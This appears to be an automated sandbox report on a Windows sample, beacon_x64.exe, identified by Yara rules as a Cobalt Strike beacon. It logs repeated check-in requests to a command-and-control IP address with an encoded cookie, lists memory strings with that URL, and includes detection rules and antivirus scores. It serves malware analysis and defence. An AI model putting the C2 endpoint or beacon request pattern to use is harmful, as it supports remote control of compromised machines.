Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache

Source: beacon_x64.exe, 00000000.00000003.2836169500.0000000000892000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/get
Source: beacon_x64.exe, 00000000.00000003.2435393695.0000000000892000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/get#
Source: beacon_x64.exe, 00000000.00000003.2836169500.0000000000892000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/get%
Source: beacon_x64.exe, 00000000.00000003.2993012953.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.2970472525.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.3069577014.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.2982082108.0000000000892000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/get&
Source: beacon_x64.exe, 00000000.00000003.2435393695.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.3069577014.0000000000892000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/get(
Source: beacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/get140/api/v1/get
Source: beacon_x64.exe, 00000000.00000003.3086750899.0000000000892000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/get2
Source: beacon_x64.exe, 00000000.00000003.2435393695.0000000000892000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/get4
Source: beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/get6666j
Source: beacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/get6666u
Source: beacon_x64.exe, 00000000.00000003.3004099013.0000000000892000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/get8
Source: beacon_x64.exe, 00000000.00000003.2910089243.0000000000892000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/get=
Source: beacon_x64.exe, 00000000.00000003.2910089243.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.2836169500.0000000000892000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/getH
Source: beacon_x64.exe, 00000000.00000003.2435393695.0000000000892000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/getJ
Source: beacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/getL
Source: beacon_x64.exe, 00000000.00000003.2836169500.0000000000892000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/getP
Source: beacon_x64.exe, 00000000.00000003.3459929835.0000000000857000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000002.4562753619.000000000081C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/getSOR_A
Source: beacon_x64.exe, 00000000.00000003.2435393695.0000000000892000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/getX
Source: beacon_x64.exe, 00000000.00000003.2435393695.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/getbd06
Source: beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/getd
Source: beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/getem32
Source: beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/geth
Source: beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/getl
Source: beacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.2993012953.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.2970472525.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.2982082108.0000000000892000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/getll
Source: beacon_x64.exe, 00000000.00000003.2970472525.0000000000892000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/getll;
Source: beacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/getllue
Source: beacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/getlp
Source: beacon_x64.exe, 00000000.00000003.3459929835.0000000000857000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000002.4562753619.000000000081C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/getocal
Source: beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/getp
Source: beacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/getstem32
Source: beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/getue
Source: beacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/gety
Source: beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://8.148.6.140/api/v1/getya

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.4563882801.0000000000CB0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2114029429.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown

Source: C:\Users\user\Desktop\beacon_x64.exe	Code function: 0_2_0077C1C8 NtAllocateVirtualMemory,	0_2_0077C1C8
Source: C:\Users\user\Desktop\beacon_x64.exe	Code function: 0_2_0077C2EC NtFreeVirtualMemory,	0_2_0077C2EC
Source: C:\Users\user\Desktop\beacon_x64.exe	Code function: 0_2_0077C3B8 NtProtectVirtualMemory,	0_2_0077C3B8

Source: C:\Users\user\Desktop\beacon_x64.exe	Code function: 0_2_0077F1A8	0_2_0077F1A8
Source: C:\Users\user\Desktop\beacon_x64.exe	Code function: 0_2_0078C280	0_2_0078C280
Source: C:\Users\user\Desktop\beacon_x64.exe	Code function: 0_2_00776B38	0_2_00776B38
Source: C:\Users\user\Desktop\beacon_x64.exe	Code function: 0_2_0078CBF0	0_2_0078CBF0
Source: C:\Users\user\Desktop\beacon_x64.exe	Code function: 0_2_00781528	0_2_00781528
Source: C:\Users\user\Desktop\beacon_x64.exe	Code function: 0_2_00780E64	0_2_00780E64
Source: C:\Users\user\Desktop\beacon_x64.exe	Code function: 0_2_00781F9C	0_2_00781F9C
Source: C:\Users\user\Desktop\beacon_x64.exe	Code function: 0_2_00CB0000	0_2_00CB0000

Source: 00000000.00000002.4563882801.0000000000CB0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2114029429.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@0/1

Source: beacon_x64.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\beacon_x64.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: beacon_x64.exe	ReversingLabs: Detection: 84%
Source: beacon_x64.exe	Virustotal: Detection: 79%

Source: C:\Users\user\Desktop\beacon_x64.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\beacon_x64.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\beacon_x64.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\beacon_x64.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\beacon_x64.exe	Section loaded: cryptbase.dll	Jump to behavior
